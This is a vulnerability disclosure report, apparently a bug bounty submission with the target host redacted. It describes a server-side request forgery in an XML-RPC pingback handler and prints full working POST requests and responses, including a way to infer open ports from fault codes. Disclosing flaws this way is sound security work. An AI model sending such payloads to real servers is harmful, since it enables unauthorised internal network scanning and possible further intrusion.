SSRF on ████████

**Summary:** The web application hosted on the "███████" domain is affected by a Server Side Request Forgery (SSRF) vulnerability that could allows an attacker to force the application to make requests to arbitrary targets. **Description:** The affected handler is the "/xmlrpc/pingback/". This handler receives an xml payload containing an arbitrary URL. This parameter is then used by the application to send a request to the target. The following request contains a valid target (for test purpose I have temporary generated the following domain: http://8hqzrzlvw4nabsf9bj3wgsl3vu1kp9.burpcollaborator.net/ with the Burp Collaborator tool): ``` POST /xmlrpc/pingback/ HTTP/1.1 Host: ███████ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 305 <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value>http://8hqzrzlvw4nabsf9bj3wgsl3vu1kp9.burpcollaborator.net/</value> </param> <param> <value>https://████/web/guest/home/</value> </param> </params> </methodCall> ``` Response: ``` HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Server: Microsoft-IIS/8.5 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1 X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 291 Date: Thu, 06 Sep 2018 07:34:54 GMT Connection: close Set-Cookie: JSESSIONID=3D2874915F19DB1CE69EBAE34C6F894C; Path=/; Secure; HttpOnly <?xml version="1.0" encoding="UTF-8"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><i4>17</i4></value></member><member><name>faultString</name><value><string>Could not find target URI in source</string></value></member></struct></value></fault></methodResponse> ``` If the response contains a "faultCode" with a value of 17 (<value><int>17</int></value>) then it means the port is open. In the following screenshot it is showed the log of the dns request sent by the DoD server. ██████ Instead by using a non-existent domain as target (http://non.existent/): ``` POST /xmlrpc/pingback/ HTTP/1.1 Host: ████ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 266 <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value>http://non.existent/</value> </param> <param> <value>https://████████/web/guest/home/</value> </param> </params> </methodCall> ``` The response contains a different "faultCode" with a different "faultString": ``` HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Server: Microsoft-IIS/8.5 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1 X-Powered-By: ASP.NET X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 282 Date: Thu, 06 Sep 2018 07:36:53 GMT Connection: close Set-Cookie: JSESSIONID=42FE4B60C1214FF84F72CFDD9E287A6C; Path=/; Secure; HttpOnly <?xml version="1.0" encoding="UTF-8"?><methodResponse><fault><value><struct><member><name>faultCode</name><value><i4>16</i4></value></member><member><name>faultString</name><value><string>Error accessing source URI</string></value></member></struct></value></fault></methodResponse> ``` By exploiting this SSRF an attacker may be able to scan the local or external networks to which the vulnerable server is connected to. ## Impact The impact of exploiting a Server Side Request Forgery vulnerability mainly depends on how the web application uses the responses from the remote resource, such as: - scan ports and IP addresses - interact with some protocols such as Gopher - discover the IP addresses of servers running behind a reverse proxy - Denial of Services - In some situation potentially remote code execution ## Step-by-step Reproduction Instructions 1. To exploit this issue an attacker has to craft a POST request, similar to the following, that contains the target URL: ``` POST /xmlrpc/pingback/ HTTP/1.1 Host: ████████ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; ANONYMOUS_USER_ID=2922001 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 305 <?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value>http://8hqzrzlvw4nabsf9bj3wgsl3vu1kp9.burpcollaborator.net/</value> </param> <param> <value>https://█████/web/guest/home/</value> </param> </params> </methodCall> ``` ## Suggested Mitigation/Remediation Actions To prevent SSRF vulnerabilities in your web applications it is strongly advised to use a whitelist of allowed domains and protocols from where the web server can fetch remote resources. If possible avoid using user input directly in functions that can make requests on behalf of the server. I'm available for further clarification, Best, Davide ## Impact The impact of exploiting a Server Side Request Forgery vulnerability mainly depends on how the web application uses the responses from the remote resource, such as: - scan ports and IP addresses - interact with some protocols such as Gopher - discover the IP addresses of servers running behind a reverse proxy - Denial of Services - In some situation potentially remote code execution